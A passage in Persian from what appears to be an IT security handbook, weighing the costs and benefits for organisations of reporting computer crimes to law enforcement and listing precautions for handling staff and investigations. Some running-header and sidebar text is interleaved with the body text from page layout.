‫ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﻫﻨﮕﺎﻣﻴﻜﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﺻﻠﻲ ﺷﻤﺎ ﺗﺤـﺖ ﺑﺎﺯﺭﺳـﻲ ﻭ‬
‫ﺁﺯﻣﺎﻳﺶ ﺍﺳﺖ‪ ،‬ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﻭﻗﺘﻲ ﺑﺎ ﺩﻭﺍﻳﺮ ﺍﺟﺮﺍﻱ ﻗﺎﻧﻮﻥ ﺑﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﺗﺤﻘﻴﻘـﺎﺕ ﻫﻤﻜـﺎﺭﻱ‬
‫ﻣــﻲﻛﻨﻴــﺪ‪ ،‬ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺩﺭ ﺍﺛــﺮ ﺳــﻨﮕﻴﻨﻲ ﻭ ﻧﺎﻛﺎﺭﺁﻣــﺪﻱ ﺁﻥ‬
‫ﺗﺤﻘﻴﻘﺎﺕ‪ ،‬ﺩﻳﺪ ﺟﺎﻣﻌﺔ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧـﺴﺒﺖ ﺑـﻪ ﺷـﻤﺎ ﻣﻨﻔـﻲ ﺷـﻮﺩ‪.‬‬
‫ﺑﻴﺸﺘﺮ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍﻳﺎﻧﻪ ﺩﻳﺪﮔﺎﻫﻲ ﻣﻨﻔﻲ ﻧﺴﺒﺖ ﺑﻪ ﻣﺠﺮﻳﺎﻥ ﻗـﺎﻧﻮﻥ‬
‫ﺩﺍﺭﻧﺪ ﻭ ﺍﮔﺮ ﺷﻤﺎ ﻫﻢ ﺩﺭ ﺁﻥ ﺟﺎﻳﮕﺎﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻳﺪ‪ ،‬ﺍﻳﻦ ﺍﺣﺴﺎﺳﺎﺕ‬
‫ﻣﺘﻮﺟﻪ ﺷﻤﺎ ﻧﻴﺰ ﻣﻲﺷﻮﺩ‪ .‬ﭼﻨﻴﻦ ﻗـﻀﺎﻭﺗﻬﺎﻳﻲ ﻣـﻲﺗﻮﺍﻧـﺪ ﺟﺎﻳﮕـﺎﻩ‬
‫ﺷﻤﺎ ﺭﺍ ﺩﺭ ﺍﻧﻈﺎﺭ ﭘﺎﻳﻴﻨﺘﺮ ﺍﺯ ﺁﻧﭽﻪ ﻛﻪ ﻣـﺴﺘﺤﻖ ﺁﻥ ﻫـﺴﺘﻴﺪ ﻗـﺮﺍﺭ‬
‫ﺩﻫﺪ ﻭ ﺍﺯ ﻫﻤﻜﺎﺭﻱ ﺷﻤﺎ ﻧﻪ ﺗﻨﻬﺎ ﺑﺎ ﺁﻥ ﺗﺤﻘﻴﻘﺎﺕ ﺑﻠﻜـﻪ ﺑـﺎ ﺳـﺎﻳﺮ‬
‫ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺗﺨﺼﺼﻲ ﻧﻴﺰ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﺪ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳـﻦ ﭘـﺲ ﺍﺯ‬
‫ﭘﺎﻳﺎﻥﻳﺎﻓﺘﻦ ﺑﺎﺯﺭﺳﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺁﻣﺎﺝ ﺣﻤﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻳـﺎ‬
‫ﺳﺎﻳﺮ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩﻫﺎ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻳﺪ‪.‬‬
‫ﺍﻳﻦ ﺭﻓﺘﺎﺭﻫﺎ ﻣﺎﻳـﺔ ﺗﺄﺳـﻔﻨﺪ‪ ،‬ﭼﺮﺍﻛـﻪ ﺑـﻪ ﻫـﺮ ﺣـﺎﻝ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ‬
‫ﺑﺎﺯﺭﺳــﺎﻥ‪ ،‬ﺩﻗﻴــﻖ ﻭ ﺣﺮﻓــﻪﺍﻱ ﻫــﺴﺘﻨﺪ ﻭ ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺑــﺮﺍﻱ‬
‫ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻳﻚ ﻓﻌﺎﻟﻴﺖ ﻣﺸﻜﻮﻙ ﻳﺎ ﺗﻬﺎﺟﻢ ﺩﺍﺋﻤﻲ‪ ،‬ﻭﺍﻗﻌـﹰﺎ ﺑـﻪ‬
‫ﺑﺎﺯﺭﺳﻴﻬﺎﻱ ﻣﻮﺷﻜﺎﻓﺎﻧﻪ ﻧﻴـﺎﺯ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ‪ .‬ﺍﻣـﺮﻭﺯ ﻣـﻲﺗـﻮﺍﻧﻴﻢ‬
‫ﺑﮕﻮﻳﻴﻢ ﻛﻪ ﺍﻳﻦ ﻣﺸﻜﻞ ﺩﺭ ﺳﺎﻟﻬﺎﻱ ﺍﺧﻴﺮ ﻛﻤﺘﺮ ﺷﺪﻩ ﻭ ﻧﮕﺮﺍﻧﻴﻬـﺎ‬
‫ﺩﺭ ﻣﻮﺭﺩ ﺁﻥ ﻧﺴﺒﺖ ﺑﻪ ﺩﻫﺔ ﮔﺬﺷﺘﻪ ﻛﺎﻫﺶ ﻳﺎﻓﺘﻪ ﺍﺳﺖ‪ .‬ﺑﻪ ﻣﺮﻭﺭ‬
‫ﺯﻣﺎﻥ ﻭ ﺑﺎ ﺁﮔﺎﻫﺘﺮ ﺷﺪﻥ ﻣﺮﺩﻡ ﻧﺴﺒﺖ ﺑﻪ ﺧﺴﺎﺭﺗﻬﺎﻱ ﻧﻔﻮﺫﮔﺮﺍﻥ ‪-‬‬
‫ﺣﺘﻲ ﺁﻧﻬﺎ ﻛﻪ ﺳﻮﺀ ﻧﻴﺘﻲ ﻧﺪﺍﺷﺘﻪﺍﻧﺪ‪ -‬ﺍﻧﺘﻈﺎﺭ ﺍﻳﻦ ﺍﺳـﺖ ﻛـﻪ ﺍﻳـﻦ‬
‫ﺍﺣﺴﺎﺳﺎﺕ ﻣﻨﻔﻲ ﻧﺴﺒﺖ ﺑﻪ ﻣﺮﺍﺟﻊ ﻗﺎﻧﻮﻧﻲ ﺍﺯ ﺍﻳﻦ ﻫـﻢ ﻛﻤﺮﻧﮕﺘـﺮ‬
‫ﺷﻮﺩ‪.‬‬
‫ﺗﻮﺻﻴﺔ ﺍﻛﻴﺪ ﻣﺎ ﺑﻪ ﺷﻤﺎ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻫﻨﮕﺎﻡ ﺗـﺼﻤﻴﻢﮔﻴـﺮﻱ ﺩﺭ‬
‫ﻲ ﺳﻴﺴﺘﻢ ﺧـﻮﺩ ﺑـﺎ‬
‫ﻣﻮﺭﺩ ﺩﺭﻣﻴﺎﻥ ﮔﺬﺍﺷﺘﻦ ﻫﺮﮔﻮﻧﻪ ﻣﺸﻜﻞ ﺍﻣﻨﻴﺘ ﹺ‬
‫ﻣﺮﺍﺟﻊ ﻗﺎﻧﻮﻧﻲ ﺧﻮﺏ ﻓﻜﺮ ﻛﻨﻴﺪ ﻭ ﺟﻮﺍﻧﺐ ﺍﻣـﺮ ﺭﺍ ﻣـﻮﺭﺩ ﺑﺮﺭﺳـﻲ‬
‫ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪ .‬ﺩﺭ ﺑﻴﺸﺘﺮ ﻣﻮﺍﻗﻊ ﺑﻬﺘـﺮ ﺍﺳـﺖ ﺑـﺴﻨﺠﻴﺪ ﻛـﻪ ﺩﺭ ﭼـﻪ‬
‫ﺻﻮﺭﺕ ﻣﺮﺍﺟﻌﻪ ﺑﻪ ﻣﺮﺍﺟﻊ ﻗﻀﺎﻳﻲ ﻻﺯﻡ ﺍﺳﺖ‪ :‬ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻭﺍﻗﻌﹰﺎ‬
‫ﭼﻴــﺰﻱ ﺭﺍ ﺍﺯ ﺩﺳــﺖ ﺩﺍﺩﻩ ﻭ ﻣﺘﺤﻤــﻞ ﺿــﺮﺭ ﺷــﺪﻩﺍﻳــﺪ ﻭ ﻳــﺎ‬
‫ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺷﺨﺼﹰﺎ ﻗﺎﺩﺭ ﺑﻪ ﻛﻨﺘﺮﻝ ﻭﺿﻌﻴﺖ ﭘﻴﺶﺁﻣﺪﻩ ﻧﻴـﺴﺘﻴﺪ‪.‬‬
‫ﺑﻌﻀﻲ ﺍﻭﻗﺎﺕ ﻫﻴﺎﻫﻮﻱ ﻧﺎﺷﻲ ﺍﺯ ﻳﻚ ﺍﺗﻔﺎﻕ ﺧﻄﺮﻧـﺎﻛﺘﺮ ﺍﺯ ﺳـﺎﻳﺮ‬
‫ﺧﺴﺎﺭﺗﻬﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﭘﻲ ﻭﻗﻮﻉ ﺁﻥ ﺍﺗﻔﺎﻕ ﺑﻪ ﺑﺎﺭ ﻣﻲﺁﻳﺪ‪.‬‬
‫ﺑﻌﺪ ﺍﺯ ﺍﻳﻨﻜﻪ ﺗﺼﻤﻴﻢ ﺑﻪ ﺍﺳﺘﻤﺪﺍﺩ ﺍﺯ ﻣﺮﺍﺟﻊ ﻗﺎﻧﻮﻧﻲ ﮔﺮﻓﺘﻴﺪ ﺍﺯ ﺑﻪﭘﺎ‬
‫ﻛﺮﺩﻥ ﻫﻴﺎﻫﻮ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺑﭙﺮﻫﻴﺰﻳﺪ‪ .‬ﺩﺭ ﺑﻌﻀﻲ ﻣـﻮﺍﺭﺩ ﺩﺧﺎﻟـﺖ‬
‫ﻣﺮﺍﺟﻊ ﻗﺎﻧﻮﻧﻲ ﻣﻲ ﺗﻮﺍﻧﺪ ﻋﺎﻣﻞ ﺩﻟﺴﺮﺩﻱ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺑﺎﺷﺪ‪ ،‬ﺍﻣـﺎ ﺩﺭ‬
‫ﺑﻌﻀﻲ ﻣﻮﺍﺭﺩ ﻧﻴـﺰ ﻣـﻲﺗﻮﺍﻧـﺪ ﺷـﻤﺎ ﺭﺍ ﺩﺭ ﻛـﺎﻧﻮﻥ ﺗﻮﺟـﻪ ﺁﻧﻬـﺎ ﻭ‬
‫ﺩﺭﻧﺘﻴﺠﻪ ﺣﻤﻼﺕ ﺑﻴﺸﺘﺮ ﻗﺮﺍﺭ ﺩﻫﺪ‪ .‬ﺁﮔﺎﻩ ﺑﺎﺷﻴﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻣﺸﻜﻞ ﻓﻌﻠﻲ ﺷﻤﺎ ﺟﺰﺋﻲ ﺍﺯ ﻳﻚ ﻣﺸﻜﻞ ﮔﺴﺘﺮﺩﻩﺗـﺮ ﺑﺎﺷـﺪ ﻛـﻪ‬
‫ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻭ ﮔﺴﺘﺮﺵ ﺍﺳﺖ ﻭ ﻟﺬﺍ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺑﺪﺭﺳﺘﻲ ﺁﻧـﺮﺍ‬
‫ﻣﺪﻳﺮﻳﺖ ﻧﻜﻨﻴﺪ ﺑﺎﻋﺚ ﻭﺍﺭﺩ ﺁﻣﺪﻥ ﺁﺳﻴﺒﻬﺎﻱ ﻓﺮﺍﻭﺍﻧـﻲ ﺑـﻪ ﺷـﻤﺎ ﻭ‬
‫ﺩﻳﮕﺮﺍﻥ ﺷﻮﺩ‪.‬‬
‫ﻣﺎ ﻋﻼﻗﻪﻣﻨﺪﻳﻢ ﻛﻪ ﺧﻮﺷﺒﻴﻨﺎﻧﻪ ﺑـﻪ ﺍﻳـﻦ ﻣﻮﺿـﻮﻉ ﻧﮕـﺎﻩ ﻛﻨـﻴﻢ‪.‬‬
‫ﻣﺮﺍﺟﻊ ﻗﺎﻧﻮﻧﻲ ﺑﻄﻮﺭ ﻛﻠـﻲ ﺍﺯ ﻧﻴـﺎﺯ ﺑـﻪ ﺍﺭﺗﻘـﺎﻱ ﺳـﻄﺢ ﺧـﻮﺩ ﺩﺭ‬
‫ﻻ ﺩﺭ ﺗﻼﺷـﻨﺪ ﻛـﻪ‬
‫ﺑﺮﺭﺳﻲ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﻃﻼﻉ ﺩﺍﺭﻧﺪ ﻭ ﻣﻌﻤﻮ ﹰ‬
‫ﻣﺮﺍﻛﺰ ﺁﻣﻮﺯﺷﻲ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻛﻨﻨﺪ‪ ،‬ﺗﺸﻜﻴﻼﺕ ﻭ ﺗﺴﻬﻴﻼﺕ ﺗﺤﻠﻴـﻞ‬
‫ﻗﺎﻧﻮﻧﻲ ﺗﻬﻴﻪ ﻧﻤﺎﻳﻨﺪ‪ ،‬ﻭ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺩﻳﮕﺮﻱ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘـﺎﺕ‬
‫ﺛﻤﺮﺑﺨﺶ ﺭﺍ ﺑﻜﺎﺭ ﮔﻴﺮﻧﺪ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﻻ ﺩﺭ ﺩﺍﺩﺳﺮﺍﻫﺎ )ﺧﺼﻮﺻﹰﺎ ﺩﺭ ﻣﻨﺎﻃﻖ‬
‫ﭘﻴﺸﺮﻓﺘﺔ ﻛﺸﻮﺭ( ﺑﻌﻀﻲ ﺑﺎﺯﺭﺳﺎﻥ ﻭ ﺩﺍﺩﻳﺎﺭﻫﺎ ﺗﺠﺮﺑﺔ ﺯﻳـﺎﺩﻱ ﻛـﺴﺐ‬
‫ﻣﻲﻛﻨﻨﺪ ﻭ ﻟﺬﺍ ﺑﺎﻳﺪ ﺩﺭ ﺗﻼﺵ ﺑﺎﺷﻨﺪ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ ﺧـﻮﺩ ﺭﺍ ﺑـﻪ‬
‫ﺳﺎﻳﺮ ﻫﻤﻜﺎﺭﺍﻧﺸﺎﻥ ﻧﻴـﺰ ﺍﻧﺘﻘـﺎﻝ ﺩﻫﻨـﺪ‪ .‬ﻧﺘﻴﺠـﺔ ﺍﻳـﻦ ﻓﺮﺁﻳﻨـﺪ ﺩﺭ‬
‫ﺳﺎﻟﻬﺎﻱ ﺍﺧﻴﺮ ﻳﻚ ﺍﺭﺗﻘﺎﻱ ﺍﺳﺎﺳﻲ ﺩﺭ ﺳـﻄﺢ ﻣﻮﻓﻘﻴـﺖ ﻓﻌﺎﻟﻴـﺖ‬
‫ﻧﻴﺮﻭﻫﺎﻱ ﺍﻧﺘﻈﺎﻣﻲ ﻭ ﺍﻧﺠـﺎﻡ ﺷـﺪﻥ ﺗﻌـﺪﺍﺩ ﺯﻳـﺎﺩﻱ ﺗﺤﻘﻴﻘـﺎﺕ ﻭ‬
‫ﺩﺍﺩﺭﺳﻴﻬﺎﻱ ﻣﻮﻓﻖ ﺩﺭ ﺣﻮﺯﺓ ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ ﺑﻮﺩﻩ ﺍﺳﺖ‪ .‬ﺑﻬﺘﺮ ﺍﺳﺖ‬
‫ﺑﻪ ﻓﻮﺍﻳﺪ ﺑﻴﺸﻤﺎﺭ ﮔﺰﺍﺭﺵﻛﺮﺩﻥ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ‪ -‬ﻧﻪ ﺗﻨﻬﺎ ﺑـﺮﺍﻱ‬
‫ﺧﻮﺩﺗــﺎﻥ‪ ،‬ﺑﻠﻜــﻪ ﺑــﺮﺍﻱ ﺗﻤــﺎﻡ ﺟﺎﻣﻌــﻪ ‪ -‬ﺗﻮﺟــﻪ ﺩﺍﺷــﺘﻪ ﺑﺎﺷــﻴﺪ‪:‬‬
‫ﺩﺍﺩﺭﺳــﻴﻬﺎﻱ ﻣﻮﻓــﻖ ﻣــﻲﺗﻮﺍﻧﻨــﺪ ﺑﺎﻋــﺚ ﺟﻠــﻮﮔﻴﺮﻱ ﺍﺯ ﺳــﻮﺀ‬
‫ﺍﺳﺘﻔﺎﺩﻩﻫﺎﻱ ﺑﻌﺪﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻤﺎ ﻭ ﻧﻴﺰ ﺩﻳﮕﺮﺍﻥ ﺷﻮﻧﺪ‪.‬‬
‫ﻣﺴﺌﻮﻟﻴﺖ ﮔﺰﺍﺭﺵ ﺟﺮﻡ‬
‫ﺩﺭ ﭘﺎﻳﺎﻥ ﺑﻪ ﻳﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻳﻚ ﺟﺮﻡ ﺗﻨﻬﺎ ﺩﺭﺻﻮﺭﺗﻲ ﻣﻮﺭﺩ‬
‫ﭘﻴﮕﺮﺩ ﻗﻀﺎﻳﻲ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ ﻛﻪ ﺷﻤﺎ ﺁﻧﺮﺍ ﮔﺰﺍﺭﺵ ﻛـﺮﺩﻩ ﺑﺎﺷـﻴﺪ‪.‬‬
‫ﺩﺭ ﻏﻴﺮﺍﻳﻨﺼﻮﺭﺕ ﺍﻳﻨﻜﺎﺭ ﺍﻧﺠﺎﻡ ﻧﻤـﻲﺷـﻮﺩ ﻭ ﺍﻳـﻦ ﻧـﻪ ﺑـﻪ ﺳـﻮﺩ‬
‫ﺷﻤﺎﺳﺖ ﻭ ﻧﻪ ﻫﻴﭽﻜﺲ ﺩﻳﮕﺮ؛ ﻭ ﺩﺳﺖ ﻧﻔﻮﺫﮔﺮ ﺭﺍ ﻧﻴﺰ ﺑﺮﺍﻱ ﻭﺍﺭﺩ‬
‫ﺁﻭﺭﺩﻥ ﺁﺳﻴﺒﻬﺎﻱ ﺑﻴﺸﺘﺮ ﻭ ﺑﻪ ﺍﻓﺮﺍﺩ ﺩﻳﮕﺮ ﺑﺎﺯ ﻣﻲﮔـﺬﺍﺭﺩ‪ .‬ﺑـﻪ ﻳـﺎﺩ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺁﻧﭽﻪ ﺷﻤﺎ ﺑﺎ ﺁﻥ ﺑﺮﺧﻮﺭﺩ ﻛﺮﺩﻩﺍﻳـﺪ‬
‫ﺟﺰﺋــﻲ ﺍﺯ ﻳــﻚ ﻣﺠﻤﻮﻋــﺔ ﻋﻈــﻴﻢ ﺟــﺮﺍﺋﻢ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻭ ﺍﻋﻤــﺎﻝ‬
‫ﺧﺮﺍﺑﻜﺎﺭﺍﻧﻪ ﺑﺎﺷﺪ‪ .‬ﺑﺪﻭﻥ ﺍﻧﺠﺎﻡ ﺑﺮﺭﺳﻴﻬﺎﻱ ﻻﺯﻡ ﻧﻤـﻲﺗـﻮﺍﻥ ﺍﺩﻋـﺎ‬
‫ﻛﺮﺩ ﻛﻪ ﺁﻧﭽﻪ ﺑﺮ ﺳﺮ ﺷﻤﺎ ﺁﻣﺪﻩ ﻳﻚ ﺭﺧﺪﺍﺩ ﻣﺠﺰﺍ ﻭ ﺑﻲﺍﺭﺗﺒﺎﻁ ﺑـﺎ‬
‫ﺳﺎﻳﺮ ﺍﺟﺰﺍﻱ ﺳﻴﺴﺘﻢ ﺑﻮﺩﻩ ﻭ ﻳﺎ ﺟﺰﺋﻲ ﺍﺯ ﻳﻚ ﺗﻬﺎﺟﻢ ﺑﺰﺭﮔﺘﺮ‪.‬‬
‫ﻞ ﺩﻳﮕ ﹺﺮ ﻋﺪﻡ ﮔﺰﺍﺭﺵ ﺟﺮﺍﺋﻢ ﺳﻨﮕﻴﻦ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﻳـﻦ ﺍﺳـﺖ‬
‫ﻣﺸﻜ ﹺ‬
‫ﻛﻪ ﺑﺮﺧﻲ ﺑﻪ ﻏﻠﻂ ﺗﺼﻮﺭ ﺧﻮﺍﻫﻨﺪ ﻛﺮﺩ ﻛﻪ ﺍﻳﻦ ﺟﺮﺍﺋﻢ ﺑﻨﺪﺭﺕ ﺭﺥ‬
‫ﻣــﻲﺩﻫﻨــﺪ ﻭ ﺩﺭﻧﺘﻴﺠــﻪ ﺍﺣﺘﻤــﺎﻝ ﻭﻗــﻮﻉ ﺍﻳــﻦ ﻣــﺸﻜﻼﺕ ﺩﺭ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﻧﺎﭼﻴﺰ ﺧﻮﺍﻫﻨﺪ ﭘﻨﺪﺍﺷﺖ‪ ،‬ﺭﻭﻱ ﺑﻮﺩﺟﻪﺑﻨﺪﻱ ﻭ‬
‫ﺁﻣﻮﺯﺵ ﻣﺄﻣﻮﺭﺍﻥ ﺟﺪﻳﺪ ﺍﺟﺮﺍﻳﻲ ﺗﺄﻛﻴﺪ ﺯﻳﺎﺩﻱ ﺑﻌﻤﻞ ﻧﺨﻮﺍﻫﺪ ﺁﻣﺪ؛‬
‫‪١٨٣‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﻧﺴﺨﺔ ﭼﺎﭘﻲ ﺗﻬﻴﻪ ﻭ ﺁﻧﻬﺎ ﺭﺍ ﺿﻤﻴﻤﺔ ﻳﺎﺩﺩﺍﺷﺘﻬﺎﻳﺘﺎﻥ ﻛﻨﻴﺪ‪.‬‬
‫ﻫﻨﮕﺎﻡ ﺍﻧﺠﺎﻡ ﺑﺎﺯﺭﺳﻴﻬﺎ ﻭ ﺗﺤﻘﻴﻘﺎﺕ‪ ،‬ﻭﺟـﻮﺩ ﻳـﻚ ﺳـﺎﺑﻘﺔ‬
‫ﻛﺘﺒﻲ ﺍﺯ ﺍﺗﻔﺎﻗﺎﺗﻲ ﻛﻪ ﺭﺥ ﺩﺍﺩﻩ ﻣﻲﺗﻮﺍﻧﺪ ﺑـﺴﻴﺎﺭ ﺍﺭﺯﺷـﻤﻨﺪ‬
‫ﺑﺎﺷﺪ‪ .‬ﺯﻣﺎﻥ ﻭ ﻣﻮﺿﻮﻉ ﻛﻠﻴﺔ ﺗﻤﺎﺳﻬﺎ ﺑﺎ ﻣﺮﺍﺟﻊ ﻗـﺎﻧﻮﻧﻲ ﺭﺍ‬
‫ﻧﻴﺰ ﺑﻪ ﺛﺒﺖ ﺑﺮﺳﺎﻧﻴﺪ‪.‬‬
‫ﺑﺮﺍﻱ ﺑﻬﺒﻮﺩ ﻗﻮﺍﻧﻴﻦ ﻓﻌﻠﻲ ﺗﻼﺵ ﻧﺎﭼﻴﺰﻱ ﺧﻮﺍﻫﺪ ﺷـﺪ؛ ﻭ ﺟﺎﻣﻌـﻪ‬
‫ﻧﻴﺰ ﺑﻪ ﻣﻮﺿﻮﻋﺎﺗﻲ ﺍﺯ ﺍﻳﻦ ﻗﺒﻴﻞ ﺗﻮﺟﻪ ﻛﻤﺘﺮﻱ ﻧﺸﺎﻥ ﺧﻮﺍﻫﺪ ﺩﺍﺩ؛‬
‫ﻭ ﺧﻼﺻﻪ ﺍﻳﻨﻜﻪ ﻧﺘﻴﺠﻪ ﺍﻳﻦ ﺧﻮﺍﻫﺪ ﺑـﻮﺩ ﻛـﻪ ﻣﺤـﻴﻂ ﺭﺍﻳﺎﻧـﻪﺍﻱ‬
‫ﺑﺮﺍﻱ ﻫﻤﺔ ﺑﺎﺯﻳﮕﺮﺍﻥ ﺁﻥ ﺧﻄﺮﻧﺎﻛﺘﺮ ﺍﺯ ﺁﻧﭽﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺑﻨﻈـﺮ‬
‫ﺑﻴﺎﻳﺪ ﺧﻮﺍﻫﺪ ﺷﺪ‪.‬‬
‫ﺍﺣﺘﻴﺎﻁ ﺑﻴﺸﺘﺮ‪...‬‬
‫•‬
‫ﺑﻪ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺧﻮﺩ ﺻﺮﺍﺣﺘﹰﺎ ﮔﻮﺷﺰﺩ ﻛﻨﻴﺪ ﻛﻪ ﻣﻠﺰﻡ ﻫﺴﺘﻨﺪ‬
‫ﺩﺭ ﭘﺎﻳﺎﻥ ﻛﺎﺭﺷﺎﻥ ﻭ ﻳﺎ ﻫﺮ ﺯﻣﺎﻥ ﻛﻪ ﺍﺯ ﺁﻧﻬﺎ ﺧﻮﺍﺳﺘﻪ ﺷـﺪ‬
‫ﻛﻠﻴﺔ ﻣﻨﺎﺑﻌﻲ ﻛﻪ ﺩﺭ ﺍﺧﺘﻴﺎﺭﺷﺎﻥ ﺑﻮﺩﻩ )ﻣﺜﻞ ﻣﺘﻦ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﻭ‬
‫ﻛﺘﺎﺑﭽﻪﻫﺎﻱ ﺭﺍﻫﻨﻤﺎ( ﺭﺍ ﺑﺎﺯﮔﺮﺩﺍﻧﻨﺪ‪.‬‬
‫•‬
‫ﺍﮔﺮ ﺍﺗﻔـﺎﻗﻲ ﺭﺥ ﺩﺍﺩﻩ ﻛـﻪ ﺑﻨﻈـﺮ ﺷـﻤﺎ ﺍﻧﺠـﺎﻡ ﺗﺤﻘﻴﻘـﺎﺕ‬
‫ﭘﻠﻴــﺴﻲ ﺭﺍ ﻻﺯﻡ ﻣــﻲﻛﻨــﺪ‪ ،‬ﺍﺟــﺎﺯﻩ ﻧﺪﻫﻴــﺪ ﻛﺎﺭﻛﻨــﺎﻥ ﺑــﻪ‬
‫ﺗﺤﻘﻴﻘــﺎﺕ ﺧﻮﺩﺳــﺮﺍﻧﻪ ﺑﭙﺮﺩﺍﺯﻧــﺪ‪ .‬ﺗﻼﺷــﻬﺎﻱ ﺧﻮﺩﺳــﺮﺍﻧﻪ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎﻋﺚ ﺷﻮﻧﺪ ﺑﻌﻀﻲ ﻣﺪﺍﺭﻙ ﺩﺭ ﺑﺎﺯﺭﺳـﻴﻬﺎﻱ‬
‫ﺭﺳﻤﻲ ﺳﻨﺪﻳﺖ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﺑﺪﻫﻨﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻣﻤﻜﻦ‬
‫ﺍﺳﺖ ﺑﺎﺯﺭﺳﺎﻥ ﺑﺎ ﻣـﺸﺎﻫﺪﺓ ﺩﺧﺎﻟـﺖ ﺷـﻤﺎ ﺩﺭ ﺗﺤﻘﻴﻘـﺎﺕ‪،‬‬
‫ﻧﺴﺒﺖ ﺑﻪ ﺷﻤﺎ ﺩﻳﺪ ﻣﻨﻔﻲ ﭘﻴﺪﺍ ﻛﻨﻨﺪ‪.‬‬
‫•‬
‫ﻛﺎﺭﻣﻨﺪﺍﻥ ﺧـﻮﺩ ﺭﺍ ﺑـﻪ ﺍﻣـﻀﺎﻱ ﺗﻮﺍﻓﻘﻨﺎﻣـﻪﺍﻱ ﺩﺭ ﺯﻣﻴﻨـﺔ‬
‫ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻳــﺸﺎﻥ ﺩﺭ ﻗﺒــﺎﻝ ﺍﻃﻼﻋــﺎﺕ ﺣــﺴﺎﺱ‪ ،‬ﻛــﺎﺭﺑﺮﺩ‬
‫ﺭﺍﻳﺎﻧﻪ‪ ،‬ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻭ ﺩﻳﮕـﺮ ﻣـﺴﺎﺋﻞ‬
‫ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺑﻌـﺪﻫﺎ ﻣﻄـﺮﺡ ﺷـﻮﻧﺪ ﻣﻠـﺰﻡ‬
‫ﻧﻤﺎﻳﻴﺪ‪ .‬ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴـﺪ ﻛـﻪ ﺳﻴﺎﺳـﺘﻬﺎ ﺻـﺮﻳﺢ ﻭ‬
‫ﻋﺎﺩﻻﻧﻪ ﻫﺴﺘﻨﺪ ﻭ ﻫﻤﺔ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺍﺯ ﺁﻥ ﺁﮔـﺎﻫﻲ ﺩﺍﺭﻧـﺪ ﻭ‬
‫ﻣﻮﺍﻓﻘﺘﻨﺎﻣﻪ ﻣﺮﺑﻮﻃﻪ ﺭﺍ ﺍﻣﻀﺎ ﻛﺮﺩﻩ ﺍﻧﺪ‪ .‬ﺗﺼﺮﻳﺢ ﻛﻨﻴـﺪ ﻛـﻪ‬
